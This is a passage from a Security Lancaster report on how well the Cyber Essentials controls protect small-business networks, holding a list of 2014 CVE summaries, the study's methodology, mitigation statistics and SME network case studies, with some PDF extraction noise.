CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
